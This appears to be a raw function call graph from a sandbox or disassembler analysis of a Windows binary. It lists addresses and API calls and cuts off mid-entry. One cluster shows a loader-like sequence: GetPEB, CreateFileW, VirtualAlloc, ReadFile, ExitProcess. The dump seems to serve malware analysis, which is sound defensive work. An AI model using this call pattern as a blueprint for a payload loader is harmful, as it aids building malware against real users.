2f720b 96484->96485 96486 287510 53 API calls 96485->96486 96489 2f7239 96485->96489 96487 2f7229 96486->96487 96779 2f2947 96487->96779 96490 284f39 68 API calls 96489->96490 96490->96431 96492 307f59 120 API calls 96491->96492 96493 30959b 96492->96493 96493->96285 96494->96287 96495->96246 96496->96249 96497->96259 96498->96271 96499->96271 96500->96248 96501->96282 96502->96282 96503->96282 96504->96280 96505->96282 96507 2edbdc GetFileAttributesW 96506->96507 96508 2ed4d5 96506->96508 96507->96508 96509 2edbe8 FindFirstFileW 96507->96509 96508->96285 96509->96508 96510 2edbf9 FindClose 96509->96510 96510->96508 96549 287510 96511->96549 96515 308281 96516 30844f 96515->96516 96520 30828f 96515->96520 96613 308ee4 60 API calls 96516->96613 96519 30845e 96519->96520 96521 30846a 96519->96521 96585 307e86 96520->96585 96537 307fd5 messages 96521->96537 96522 287510 53 API calls 96539 308049 96522->96539 96527 3082c8 96600 29fc70 96527->96600 96530 308302 96607 2863eb 22 API calls 96530->96607 96531 3082e8 96606 2f359c 82 API calls __wsopen_s 96531->96606 96534 3082f3 GetCurrentProcess TerminateProcess 96534->96530 96535 308311 96608 286a50 22 API calls 96535->96608 96537->96401 96538 30832a 96548 308352 96538->96548 96609 2904f0 22 API calls 96538->96609 96539->96515 96539->96522 96539->96537 96604 2e417d 22 API calls __fread_nolock 96539->96604 96605 30851d 42 API calls _strftime 96539->96605 96541 3084c5 96541->96537 96543 3084d9 FreeLibrary 96541->96543 96542 308341 96610 308b7b 75 API calls 96542->96610 96543->96537 96548->96541 96611 2904f0 22 API calls 96548->96611 96612 28aceb 23 API calls messages 96548->96612 96614 308b7b 75 API calls 96548->96614 96550 287522 96549->96550 96551 287525 96549->96551 96550->96537 96572 308cd3 96550->96572 96552 28755b 96551->96552 96553 28752d 96551->96553 96555 2c50f6 96552->96555 96558 28756d 96552->96558 96563 2c500f 96552->96563 96615 2a51c6 26 API calls 96553->96615 96618 2a5183 26 API calls 96555->96618 96556 28753d 96562 29fddb 22 API calls 96556->96562 96616 29fb21 51 API calls 96558->96616 96559 2c510e 96559->96559 96564 287547 96562->96564 96566 29fe0b 22 API calls 96563->96566 96567 2c5088 96563->96567 96565 289cb3 22 API calls 96564->96565 96565->96550 96568 2c5058 96566->96568 96617 29fb21 51 API calls 96567->96617 96569 29fddb 22 API calls 96568->96569 96570 2c507f 96569->96570 96571 289cb3 22 API calls 96570->96571 96571->96567 96573 28aec9 22 API calls 96572->96573 96574 308cee CharLowerBuffW 96573->96574 96619 2e8e54 96574->96619 96578 28a961 22 API calls 96579 308d2a 96578->96579 96626 286d25 96579->96626 96581 308d3e 96582 2893b2 22 API calls 96581->96582 96584 308d48 _wcslen 96582->96584 96583 308e5e _wcslen 96583->96539 96584->96583 96639 30851d 42 API calls _strftime 96584->96639 96586 307ea1 96585->96586 96590 307eec 96585->96590 96587 29fe0b 22 API calls 96586->96587 96588 307ec3 96587->96588 96589 29fddb 22 API calls 96588->96589 96588->96590 96589->96588 96591 309096 96590->96591 96592 3092ab messages 96591->96592 96599 3090ba _strcat _wcslen 96591->96599 96592->96527 96593 28b38f 39 API calls 96593->96599 96594 28b567 39 API calls 96594->96599 96595 28b6b5 39 API calls 96595->96599 96596 287510 53 API calls 96596->96599 96597 2aea0c 21 API calls ___std_exception_copy 96597->96599 96599->96592 96599->96593 96599->96594 96599->96595 96599->96596 96599->96597 96643 2eefae 24 API calls _wcslen 96599->96643 96601 29fc85 96600->96601 96602 29fd1d VirtualAlloc 96601->96602 96603 29fceb 96601->96603 96602->96603 96603->96530 96603->96531 96604->96539 96605->96539 96606->96534 96607->96535 96608->96538 96609->96542 96610->96548 96611->96548 96612->96548 96613->96519 96614->96548 96615->96556 96616->96556 96617->96555 96618->96559 96620 2e8e74 _wcslen 96619->96620 96621 2e8f63 96620->96621 96623 2e8f68 96620->96623 96625 2e8ea9 96620->96625 96621->96578 96621->96584 96623->96621 96641 29ce60 41 API calls 96623->96641 96625->96621 96640 29ce60 41 API calls 96625->96640 96627 286d91 96626->96627 96628 286d34 96626->96628 96630 2893b2 22 API calls 96627->96630 96628->96627 96629 286d3f 96628->96629 96631 2c4c9d 96629->96631 96632 286d5a 96629->96632 96635 286d62 __fread_nolock 96630->96635 96634 29fddb 22 API calls 96631->96634 96642 286f34 22 API calls 96632->96642 96636 2c4ca7 96634->96636 96635->96581 96637 29fe0b 22 API calls 96636->96637 96638 2c4cda 96637->96638 96639->96583 96640->96625 96641->96623 96642->96635 96643->96599 96645 286270 22 API calls 96644->96645 96656 289eb5 96645->96656 96646 289fd2 96647 28a4a1 22 API calls 96646->96647 96648 289fec 96647->96648 96648->96406 96651 2cf7c4 96678 2e96e2 84 API calls __wsopen_s 96651->96678 96652 2cf699 96660 29fddb 22 API calls 96652->96660 96653 28a12c __fread_nolock 96653->96651 96664 28a405 96653->96664 96655 2cf7d2 96662 28a4a1 22 API calls 96655->96662 96656->96646 96656->96651 96656->96652 96656->96653 96659 28a6c3 22 API calls 96656->96659 96656->96664 96667 28a587 22 API calls 96656->96667 96668 28aec9 22 API calls 96656->96668 96669 28a4a1 22 API calls 96656->96669 96673 284573 41 API calls _wcslen 96656->96673 96675 2848c8 23 API calls 96656->96675 96676 2849bd 22 API calls __fread_nolock 96656->96676 96677 28a673 22 API calls 96656->96677 96659->96656 96661 2cf754 96660->96661 96665 29fe0b 22 API calls 96661->96665 96663 2cf7e8 96662->96663 96663->96648 96664->96648 96679 2e96e2 84 API calls __wsopen_s 96664->96679 96665->96653 96667->96656 96670 28a0db CharUpperBuffW 96668->96670 96669->96656 96674 28a673 22 API calls 96670->96674 96672->96410 96673->96656 96674->96656 96675->96656 96676->96656 96677->96656 96678->96655 96679->96648 96681 28a961 22 API calls 96680->96681 96682 285275 96681->96682 96683 28a961 22 API calls 96682->96683 96684 28527d 96683->96684 96685 28a961 22 API calls 96684->96685 96686 285285 96685->96686 96687 28a961 22 API calls 96686->96687 96688 28528d 96687->96688 96689 2c3df5 96688->96689 96690 2852c1 96688->96690 96691 28a8c7 22 API calls 96689->96691 96692 286d25 22 API calls 96690->96692 96693 2c3dfe 96691->96693 96694 2852cf 96692->96694 96695 28a6c3 22 API calls 96693->96695 96696 2893b2 22 API calls 96694->96696 96699 285304 96695->96699 96697 2852d9 96696->96697 96698 286d25 22 API calls 96697->96698 96697->96699 96702 2852fa 96698->96702 96700 285325 96699->96700 96706 2c3e20 96699->96706 96715 285349 96699->96715 96705 284c6d 22 API calls 96700->96705 96700->96715 96701 286d25 22 API calls 96704 28535a 96701->96704 96703 2893b2 22 API calls 96702->96703 96703->96699 96708 285370 96704->96708 96711 28a8c7 22 API calls 96704->96711 96709 285332 96705->96709 96710 286b57 22 API calls 96706->96710 96707 285384 96712 28538f 96707->96712 96716 28a8c7 22 API calls 96707->96716 96708->96707 96713 28a8c7 22 API calls 96708->96713 96714 286d25 22 API calls 96709->96714 96709->96715 96719 2c3ee0 96710->96719 96711->96708 96717 28a8c7 22 API calls 96712->96717 96720 28539a 96712->96720 96713->96707 96714->96715 96715->96701 96716->96712 96717->96720 96718 284c6d 22 API calls 96718->96719 96719->96715 96719->96718 96837 2849bd 22 API calls __fread_nolock 96719->96837 96720->96461 96723 28aec9 22 API calls 96722->96723 96724 284c78 96723->96724 96724->96466 96724->96468 96726 2ed7d8 96725->96726 96727 2ed7dd 96726->96727 96728 2ed7f3 96726->96728 96730 2ed7ee 96727->96730 96731 28a8c7 22 API calls 96727->96731 96729 28a961 22 API calls 96728->96729 96732 2ed7fb 96729->96732 96730->96483 96731->96730 96733 28a961 22 API calls 96732->96733 96734 2ed803 96733->96734 96735 28a961 22 API calls 96734->96735 96736 2ed80e 96735->96736 96737 28a961 22 API calls 96736->96737 96738 2ed816 96737->96738 96739 28a961 22 API calls 96738->96739 96740 2ed81e 96739->96740 96741 28a961 22 API calls 96740->96741 96742 2ed826 96741->96742 96743 28a961 22 API calls 96742->96743 96744 2ed82e 96743->96744 96745 28a961 22 API calls 96744->96745 96746 2ed836 96745->96746 96747 28525f 22 API calls 96746->96747 96748 2ed84d 96747->96748 96749 28525f 22 API calls 96748->96749 96750 2ed866 96749->96750 96751 284c6d 22 API calls 96750->96751 96752 2ed872 96751->96752 96753 2ed885 96752->96753 96754 2893b2 22 API calls 96752->96754 96755 284c6d 22 API calls 96753->96755 96754->96753 96756 2ed88e 96755->96756 96757 2ed89e 96756->96757 96759 2893b2 22 API calls 96756->96759 96758 2ed8b0 96757->96758 96760 28a8c7 22 API calls 96757->96760 96761 286350 22 API calls 96758->96761 96759->96757 96760->96758 96762 2ed8bb 96761->96762 96838 2ed978 22 API calls 96762->96838 96764 2ed8ca 96839 2ed978 22 API calls 96764->96839 96766 2ed8dd 96767 284c6d 22 API calls 96766->96767 96768 2ed8e7 96767->96768 96769 2ed8fe 96768->96769 96770 2ed8ec 96768->96770 96771 284c6d 22 API calls 96769->96771 96772 2833c6 22 API calls 96770->96772 96773 2ed907 96771->96773 96774 2ed8f9 96772->96774 96775 2ed925 96773->96775 96776 2833c6 22 API calls 96773->96776 96777 286350 22 API calls 96774->96777 96778 286350 22 API calls 96775->96778 96776->96774 96777->96775 96778->96730 96780 2f2954 __wsopen_s 96779->96780 96781 29fe0b 22 API calls 96780->96781 96782 2f2971 96781->96782 96783 285722 22 API calls 96782->96783 96784 2f297b 96783->96784 96785 2f274e 27 API calls 96784->96785 96786 2f2986 96785->96786 96787 28511f 64 API calls 96786->96787 96788 2f299b 96787->96788 96789 2f29bf 96788->96789 96790 2f2a6c 96788->96790 96791 2f2e66 75 API calls 96789->96791 96792 2f2e66 75 API calls 96790->96792 96793 2f29c4 96791->96793 96794 2f2a38 96792->96794 96828 2f2a75 messages 96793->96828 96844 2ad583 26 API calls 96793->96844 96797 2850f5 40 API calls 96794->96797 96794->96828 96796 2f29ed 96845 2ad583 26 API calls 96796->96845 96798 2f2a91 96797->96798 96799 2850f5 40 API calls 96798->96799 96800 2f2aa1 96799->96800 96801 2850f5 40 API calls 96800->96801 96803 2f2abc 96801->96803 96804 2850f5 40 API calls 96803->96804 96805 2f2acc 96804->96805 96806 2850f5 40 API calls 96805->96806 96807 2f2ae7 96806->96807 96808 2850f5 40 API calls 96807->96808 96809 2f2af7 96808->96809 96810 2850f5 40 API calls 96809->96810 96811 2f2b07 96810->96811 96812 2850f5 40 API calls 96811->96812 96813 2f2b17 96812->96813 96840 2f3017 GetTempPathW GetTempFileNameW 96813->96840 96815 2f2b22 96816 2ae5eb 29 API calls 96815->96816 96826 2f2b33 96816->96826 96817 2f2bed 96818 2ae678 67 API calls 96817->96818 96819 2f2bf8 96818->96819 96821 2f2bfe DeleteFileW 96819->96821 96822 2f2c12 96819->96822 96820 2850f5 40 API calls 96820->96826 96821->96828 96823 2f2c91 CopyFileW 96822->96823 96830 2f2c18 96822->96830 96824 2f2cb9 DeleteFileW 96823->96824 96825 2f2ca7 DeleteFileW 96823->96825 96841 2f2fd8 CreateFileW 96824->96841 96825->96828 96826->96817 96826->96820 96826->96828 96829 2adbb3 65 API calls 96826->96829 96828->96489 96829->96826 96831 2f22ce 79 API calls 96830->96831 96832 2f2c7c 96831->96832 96832->96824 96833 2f2c80 DeleteFileW 96832->96833 96833->96828 96834->96416 96835->96450 96836->96464 96837->96719 96838->96764 96839->96766 96840->96815 96842 2f2fff SetFileTime CloseHandle 96841->96842 96843 2f3013 96841->96843 96842->96843 96843->96828 96844->96796 96845->96794 96847 28ae01 96846->96847 96850 28ae1c messages 96846->96850 96848 28aec9 22 API calls 96847->96848 96849 28ae09 CharUpperBuffW 96848->96849 96849->96850 96850->96297 96852 28acae 96851->96852 96853 28acd1 96852->96853 96881 2f359c 82 API calls __wsopen_s 96852->96881 96853->96350 96856 2cfadb 96855->96856 96857 28ad92 96855->96857 96858 29fddb 22 API calls 96857->96858 96859 28ad99 96858->96859 96882 28adcd 96859->96882 96862->96346 96863->96349 96864->96349 96865->96301 96866->96339 96867->96317 96868->96339 96869->96339 96870->96350 96871->96350 96872->96350 96873->96350 96874->96350 96875->96350 96876->96332 96877->96339 96878->96336 96879->96343 96880->96339 96881->96853 96886 28addd 96882->96886 96883 28adb6 96883->96350 96884 29fddb 22 API calls 96884->96886 96885 28a961 22 API calls 96885->96886 96886->96883 96886->96884 96886->96885 96887 28a8c7 22 API calls 96886->96887 96888 28adcd 22 API calls 96886->96888 96887->96886 96888->96886 96889->96378 96890->96378 96891->96373 96892->96373 96893->96377 96894->96373 96895 32023b0 96909 3200000 96895->96909 96897 3202470 96912 32022a0 96897->96912 96899 3202499 CreateFileW 96901 32024e8 96899->96901 96902 32024ed 96899->96902 96902->96901 96903 3202504 VirtualAlloc 96902->96903 96903->96901 96904 3202522 ReadFile 96903->96904 96904->96901 96905 320253d 96904->96905 96906 32012a0 13 API calls 96905->96906 96907 3202570 96906->96907 96908 3202593 ExitProcess 96907->96908 96908->96901 96915 32034a0 GetPEB 96909->96915 96911 320068b 96911->96897 96913 32022a9 Sleep 96912->96913 96914 32022b7 96913->96914 96916 32034ca 96915->96916 96916->96911 96917 281098 96922 2842de 96917->96922 96921 2810a7 96923 28a961 22 API calls 96922->96923 96924 2842f5 GetVersionExW 96923->96924 96925 286b57 22 API calls 96924->96925 96926 284342 96925->96926 96927 2893b2 22 API calls 96926->96927 96941 284378 96926->96941 96928 28436c 96927->96928 96930 2837a0 22 API calls 96928->96930 96929 28441b GetCurrentProcess IsWow64Process 96931 284437 96929->96931 96930->96941 96932 28444f LoadLibraryA 96931->96932 96933 2c3824 GetSystemInfo 96931->96933 96934 28449c GetSystemInfo 96932->96934 96935 284460 GetProcAddress 96932->96935 96938 284476 96934->96938 96935->96934 96937 284470 GetNativeSystemInfo 96935->96937 96936 2c37df 96937->96938 96939 28447a FreeLibrary 96938->96939 96940 28109d 96938->96940 96939->96940 96942 2a00a3 29 API calls __onexit 96940->96942 96941->96929 96941->96936 96942->96921 96943 2b90fa 96944 2b911f 96943->96944 96945 2b9107 96943->96945 96949 2b917a 96944->96949 96957 2b9117 96944->96957 96995 2bfdc4 21 API calls 2 library calls 96944->96995 96993 2af2d9 20 API calls __dosmaperr 96945->96993 96947 2b910c 96994 2b27ec 26 API calls __fread_nolock 96947->96994 96951 2ad955 __fread_nolock 26 API calls 96949->96951 96952 2b9192 96951->96952 96963 2b8c32 96952->96963 96954 2b9199 96955 2ad955 __fread_nolock 26 API calls 96954->96955 96954->96957 96956 2b91c5 96955->96956 96956->96957 96958 2ad955 __fread_nolock 26 API calls 96956->96958 96959 2b91d3 96958->96959 96959->96957 96960 2ad955 __fread_nolock 26 API calls 96959->96960 96961 2b91e3 96960->96961 96962 2ad955 __fread_nolock 26 API calls 96961->96962 96962->96957 96964 2b8c3e BuildCatchObjectHelperInternal 96963->96964 96965 2b8c5e 96964->96965 96966 2b8c46 96964->96966 96967 2b8d24 96965->96967 96971 2b8c97 96965->96971 96997 2af2c6 20 API calls __dosmaperr 96966->96997 97004 2af2c6 20 API calls __dosmaperr 96967->97004 96970 2b8c4b 96998 2af2d9 20 API calls __dosmaperr 96970->96998 96975 2b8cbb 96971->96975 96976 2b8ca6 96971->96976 96972 2b8d29 97005 2af2d9 20 API calls __dosmaperr 96972->97005 96974 2b8c53 __fread_nolock 96974->96954 96996 2b5147 EnterCriticalSection 96975->96996 96999 2af2c6 20 API calls __dosmaperr 96976->96999 96980 2b8cab 97000 2af2d9 20 API calls __dosmaperr 96980->97000 96981 2b8cc1 96983 2b8cdd 96981->96983 96984 2b8cf2 96981->96984 97001 2af2d9 20 API calls __dosmaperr 96983->97001 96986 2b8d45 __fread_nolock 38 API calls 96984->96986 96989 2b8ced 96986->96989 96987 2b8cb3 97006 2b27ec 26 API calls __fread_nolock 96987->97006 97003 2b8d1c LeaveCriticalSection __wsopen_s 96989->97003 96990 2b8ce2 97002 2af2c6 20 API calls __dosmaperr 96990->97002 96993->96947 96994->96957 96995->96949 96996->96981 96997->96970 96998->96974 96999->96980 97000->96987 97001->96990 97002->96989 97003->96974 97004->96972 97005->96987 97006->96974 97007 2a03fb 97008 2a0407 BuildCatchObjectHelperInternal 97007->97008 97036 29feb1 97008->97036 97010 2a040e 97011 2a0561 97010->97011 97014 2a0438 97010->97014 97063 2a083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97011->97063 97013 2a0568 97064 2a4e52 28 API calls _abort 97013->97064 97025 2a0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97014->97025 97047 2b247d 97014->97047 97016 2a056e 97065 2a4e04 28 API calls _abort 97016->97065 97020 2a0576 97021 2a0457 97023 2a04d8 97055 2a0959 97023->97055 97025->97023 97059 2a4e1a 38 API calls 3 library calls 97025->97059 97027 2a04de 97028 2a04f3 97027->97028 97060 2a0992 GetModuleHandleW 97028->97060 97030 2a04fa 97030->97013 97031 2a04fe 97030->97031 97032 2a0507 97031->97032 97061 2a4df5 28 API calls _abort 97031->97061 97062 2a0040 13 API calls 2 library calls 97032->97062 97035 2a050f 97035->97021 97037 29feba 97036->97037 97066 2a0698 IsProcessorFeaturePresent 97037->97066 97039 29fec6 97067 2a2c94 10 API calls 3 library calls 97039->97067 97041 29fecb 97046 29fecf 97041->97046 97068 2b2317 97041->97068 97044 29fee6 97044->97010 97046->97010 97050 2b2494 97047->97050 97048 2a0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97049 2a0451 97048->97049 97049->97021 97051 2b2421 97049->97051 97050->97048 97053 2b2450 97051->97053 97052 2a0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97054 2b2479 97052->97054 97053->97052 97054->97025 97111 2a2340 97055->97111 97057 2a096c GetStartupInfoW 97058 2a097f 97057->97058 97058->97027 97059->97023 97060->97030 97061->97032 97062->97035 97063->97013 97064->97016 97065->97020 97066->97039 97067->97041 97072 2bd1f6 97068->97072 97071 2a2cbd 8 API calls 3 library calls 97071->97046 97075 2bd213 97072->97075 97076 2bd20f 97072->97076 97073 2a0a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97074 29fed8 97073->97074 97074->97044 97074->97071 97075->97076 97078 2b4bfb 97075->97078 97076->97073 97079 2b4c07 BuildCatchObjectHelperInternal 97078->97079 97090 2b2f5e EnterCriticalSection 97079->97090 97081 2b4c0e 97091 2b50af 97081->97091 97083 2b4c1d 97088 2b4c2c 97083->97088 97104 2b4a8f 29 API calls 97083->97104 97086 2b4c27 97105 2b4b45 GetStdHandle GetFileType 97086->97105 97106 2b4c48 LeaveCriticalSection _abort 97088->97106 97089 2b4c3d __fread_nolock 97089->97075 97090->97081 97092 2b50bb BuildCatchObjectHelperInternal 97091->97092 97093 2b50c8 97092->97093 97094 2b50df 97092->97094 97108 2af2d9 20 API calls __dosmaperr 97093->97108 97107 2b2f5e EnterCriticalSection 97094->97107 97097 2b50cd 97109 2b27ec 26 API calls __fread_nolock 97097->97109 97098 2b50eb 97102 2b5000 __wsopen_s 21 API calls 97098->97102 97103 2b5117 97098->97103 97101 2b50d7 __fread_nolock 97101->97083 97102->97098 97110 2b513e LeaveCriticalSection _abort 97103->97110 97104->97086 97105->97088 97106->97089 97107->97098 97108->97097 97109->97101 97110->97101 97112 2a2357 97111->97112 97112->97057 97112->97112 97113 28105b 97118 28344d 97113->97118 97115 28106a 97149 2a00a3 29 API calls __onexit 97115->97149 97117 281074 97119 28345d __wsopen_s 97118->97119 97120 28a961 22 API calls 97119->97120 97121 283513 97120->97121 97122 283a5a 24 API calls 97121->97122 97123 28351c 97122->97123 97150 283357 97123->97150 97126 2833c6 22 API calls 97127 283535 97126->97127 97128 28515f 22 API calls 97127->97128 97129 283544 97128->97129 97130 28a961 22 API calls 97129->97130 97131 28354d 97130->97131 97132 28a6c3 22 API calls 97131->97132 97133 283556 RegOpenKeyExW 97132->97133 97134 2c3176 RegQueryValueExW 97133->97134 97138 283578 97133->97138 97135 2c320c RegCloseKey 97134->97135 97136 2c3193 97134->97136 97135->97138 97148 2c321e _wcslen 97135->97148 97137 29fe0b 22 API calls 97136->97137 97139 2c31ac 97137->97139 97138->97115 97141 285722 22 API calls 97139->97141 97140 284c6d 22 API calls 97140->97148 97142 2c31b7 RegQueryValueExW 97141->97142 97143 2c31d4 97142->97143 97145 2c31ee messages 97142->97145 97144 286b57 22 API calls 97143->97144 97144->97145 97145->97135 97146 289cb3 22 API calls 97146->97148 97147 28515f 22 API calls 97147->97148 97148->97138 97148->97140 97148->97146 97148->97147 97149->97117 97151 2c1f50 __wsopen_s 97150->97151 97152 283364 GetFullPathNameW 97151->97152 97153 283386 97152->97153 97154 286b57 22 API calls 97153->97154 97155 2833a4 97154->97155 97155->97126 97156 28dddc 97159 28b710 97156->97159 97160 28b72b 97159->97160 97161 2d00f8 97160->97161 97162 2d0146 97160->97162 97185 28b750 97160->97185 97165 2d0102 97161->97165 97168 2d010f 97161->97168 97161->97185 97201 3058a2 235 API calls 2 library calls 97162->97201 97199 305d33 235 API calls 97165->97199 97186 28ba20 97168->97186 97200 3061d0 235 API calls 2 library calls 97168->97200 97171 2d03d9 97171->97171 97175 28ba4e 97176 2d0322 97204 305c0c 82 API calls 97176->97204 97183 28bbe0 40 API calls 97183->97185 97184 29d336 40 API calls 97184->97185 97185->97175 97185->97176 97185->97183 97185->97184 97185->97186 97187 28ec40 235 API calls 97185->97187 97188 28a8c7 22 API calls 97185->97188 97190 28a81b 41 API calls 97185->97190 97191 29d2f0 40 API calls 97185->97191 97192 29a01b 235 API calls 97185->97192 97193 2a0242 5 API calls __Init_thread_wait 97185->97193 97194 29edcd 22 API calls 97185->97194 97195 2a00a3 29 API calls __onexit 97185->97195 97196 2a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97185->97196 97197 29ee53 82 API calls 97185->97197 97198 29e5ca 235 API calls 97185->97198 97202 28aceb 23 API calls messages 97185->97202 97203 2df6bf 23 API calls 97185->97203 97186->97175 97205 2f359c 82 API calls __wsopen_s 97186->97205 97187->97185 97188->97185 97190->97185 97191->97185 97192->97185 97193->97185 97194->97185 97195->97185 97196->97185 97197->97185 97198->97185 97199->97168 97200->97186 97201->97185 97202->97185 97203->97185 97204->97186 97205->97171 97206 28f7bf 97207 28f7d3 97206->97207 97208 28fcb6 97206->97208 97210 28fcc2 97207->97210 97212 29fddb 22 API calls 97207->97212 97243 28aceb 23 API calls messages 97208->97243 97244 28aceb 23 API calls messages 97210->97244 97213 28f7e5 97212->97213 97213->97210 97214 28f83e 97213->97214 97215 28fd3d 97213->97215 97217 291310 235 API calls 97214->97217 97238 28ed9d messages 97214->97238 97245 2f1155 22 API calls 97215->97245 97237 28ec76 messages 97217->97237 97219 28fef7 97223 28a8c7 22 API calls 97219->97223 97219->97238 97221 2d4600 97226 28a8c7 22 API calls 97221->97226 97221->97238 97222 2d4b0b 97247 2f359c 82 API calls __wsopen_s 97222->97247 97223->97238 97226->97238 97228 28a8c7 22 API calls 97228->97237 97229 28fbe3 97231 2d4bdc 97229->97231 97229->97238 97240 28f3ae messages 97229->97240 97230 28a961 22 API calls 97230->97237 97248 2f359c 82 API calls __wsopen_s 97231->97248 97233 2a00a3 29 API calls pre_c_initialization 97233->97237 97234 2a0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97234->97237 97235 2d4beb 97249 2f359c 82 API calls __wsopen_s 97235->97249 97236 29fddb 22 API calls 97236->97237 97237->97219 97237->97221 97237->97222 97237->97228 97237->97229 97237->97230 97237->97233 97237->97234 97237->97235 97237->97236 97237->97238 97239 2a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97237->97239 97237->97240 97241 2901e0 235 API calls 2 library calls 97237->97241 97242 2906a0 41 API calls messages 97237->97242 97239->97237 97240->97238 97246 2f359c 82 API calls __wsopen_s 97240->97246 97241->97237 97242->97237 97243->97210 97244->97215 97245->97238 97246->97238 97247->97238 97248->97235 97249->97238 97250 2d3f75 97261 29ceb1 97250->97261 97252 2d3f8b 97253 2d4006 97252->97253 97270 29e300 23 API calls 97252->97270 97255 28bf40 235 API calls 97253->97255 97257 2d4052 97255->97257 97256 2d3fe6 97256->97257 97271 2f1abf 22 API calls 97256->97271 97259 2d4a88 97257->97259 97272 2f359c 82 API calls __wsopen_s 97257->97272 97262 29cebf 97261->97262 97263 29ced2 97261->97263 97273 28aceb 23 API calls messages 97262->97273 97265 29cf05 97263->97265 97266 29ced7 97263->97266 97274 28aceb 23 API calls messages 97265->97274 97267 29fddb 22 API calls 97266->97267 97269 29cec9 97267->97269 97269->97252 97270->97256 97271->97253 97272->97259 97273->97269 97274->97269 97275 281033 97280 284c91 97275->97280 97279 281042 97281 28a961 22 API calls 97280->97281 97282 284cff 97281->97282 97288 283af0 97282->97288 97285 284d9c 97286 281038 97285->97286 97291 2851f7 22 API calls __fread_nolock 97285->97291 97287 2a00a3 29 API calls __onexit 97286->97287 97287->97279 97292 283b1c 97288->97292 97291->97285 97293 283b0f 97292->97293 97294 283b29 97292->97294 97293->97285 97294->97293 97295 283b30 RegOpenKeyExW 97294->97295 97295->97293 97296 283b4a RegQueryValueExW 97295->97296 97297 283b80 RegCloseKey 97296->97297 97298 283b6b 97296->97298 97297->97293 97298->97297 97299 283156 97302 283170 97299->97302 97303 283187 97302->97303 97304 2831eb 97303->97304 97305 28318c 97303->97305 97342 2831e9 97303->97342 97307 2c2dfb 97304->97307 97308 2831f1 97304->97308 97309 283199 97305->97309 97310 283265 PostQuitMessage 97305->97310 97306 2831d0 DefWindowProcW 97344 28316a 97306->97344 97351 2818e2 10 API calls 97307->97351 97311 2831f8 97308->97311 97312 28321d SetTimer RegisterWindowMessageW 97308->97312 97314 2c2e7c 97309->97314 97315 2831a4 97309->97315 97310->97344 97317 2c2d9c 97311->97317 97318 283201 KillTimer 97311->97318 97320 283246 CreatePopupMenu 97312->97320 97312->97344 97356 2ebf30 34 API calls ___scrt_fastfail 97314->97356 97321 2c2e68 97315->97321 97322 2831ae 97315->97322 97326 2c2dd7 MoveWindow 97317->97326 97327 2c2da1 97317->97327 97347 2830f2 Shell_NotifyIconW ___scrt_fastfail 97318->97347 97319 2c2e1c 97352 29e499 42 API calls 97319->97352 97320->97344 97355 2ec161 27 API calls ___scrt_fastfail 97321->97355 97323 2c2e4d 97322->97323 97324 2831b9 97322->97324 97323->97306 97354 2e0ad7 22 API calls 97323->97354 97331 283253 97324->97331 97336 2831c4 97324->97336 97325 2c2e8e 97325->97306 97325->97344 97326->97344 97332 2c2dc6 SetFocus 97327->97332 97333 2c2da7 97327->97333 97349 28326f 44 API calls ___scrt_fastfail 97331->97349 97332->97344 97333->97336 97337 2c2db0 97333->97337 97334 283214 97348 283c50 DeleteObject DestroyWindow 97334->97348 97336->97306 97353 2830f2 Shell_NotifyIconW ___scrt_fastfail 97336->97353 97350 2818e2 10 API calls 97337->97350 97340 283263 97340->97344 97342->97306 97345 2c2e41 97346 283837 49 API calls 97345->97346 97346->97342 97347->97334 97348->97344 97349->97340 97350->97344 97351->97319 97352->97336 97353->97345 97354->97342 97355->97340 97356->97325 97357 282e37 97358 28a961 22 API calls 97357->97358 97359 282e4d 97358->97359 97436 284ae3 97359->97436 97361 282e6b 97362 283a5a 24 API calls 97361->97362 97363 282e7f 97362->97363 97364 289cb3 22 API calls 97363->97364 97365 282e8c 97364->97365 97366 284ecb 94 API calls 97365->97366 97367 282ea5 97366->97367 97368 282ead 97367->97368 97369 2c2cb0 97367->97369 97372 28a8c7 22 API calls 97368->97372 97370 2f2cf9 80 API calls 97369->97370 97371 2c2cc3 97370->97371 97373 2c2ccf 97371->97373 97375 284f39 68 API calls 97371->97375 97374 282ec3 97372->97374 97378 284f39 68 API calls 97373->97378 97450 286f88 22 API calls 97374->97450 97375->97373 97377 282ecf 97379 289cb3 22 API calls 97377->97379 97380 2c2ce5 97378->97380 97381 282edc 97379->97381 97466 283084 22 API calls 97380->97466 97451 28a81b 41 API calls 97381->97451 97384 282eec 97386 289cb3 22 API calls 97384->97386 97385 2c2d02 97467 283084 22 API calls 97385->97467 97388 282f12 97386->97388 97452 28a81b 41 API calls 97388->97452 97389 2c2d1e 97391 283a5a 24 API calls 97389->97391 97393 2c2d44 97391->97393 97392 282f21 97395 28a961 22 API calls 97392->97395 97468 283084 22 API calls 97393->97468 97397 282f3f 97395->97397 97396 2c2d50 97398 28a8c7 22 API calls 97396->97398 97453 283084 22 API calls 97397->97453 97400 2c2d5e 97398->97400 97469 283084 22 API calls 97400->97469 97402 282f4b 97454 2a4a28 40 API calls 3 library calls 97402->97454 97403 2c2d6d 97407 28a8c7 22 API calls 97403->97407 97405 282f59 97405->97380 97406 282f63 97405->97406 97455 2a4a28 40 API calls 3 library calls 97406->97455 97409 2c2d83 97407->97409 97470 283084 22 API calls 97409->97470 97410 282f6e 97410->97385 97412 282f78 97410->97412 97456 2a4a28 40 API calls 3 library calls 97412->97456 97413 2c2d90 97415 282f83 97415->97389 97416 282f8d 97415->97416 97457 2a4a28 40 API calls 3 library calls 97416->97457 97418 282f98 97419 282fdc 97418->97419 97458 283084 22 API calls 97418->97458 97419->97403 97420 282fe8 97419->97420 97420->97413 97460 2863eb 22 API calls 97420->97460 97422 282fbf 97424 28a8c7 22 API calls 97422->97424 97426 282fcd 97424->97426 97425 282ff8 97461 286a50 22 API calls 97425->97461 97459 283084 22 API calls 97426->97459 97429 283006 97462 2870b0 23 API calls 97429->97462 97433 283021 97434 283065 97433->97434 97463 286f88 22 API calls 97433->97463 97464 2870b0 23 API calls 97433->97464 97465 283084 22 API calls 97433->97465 97437 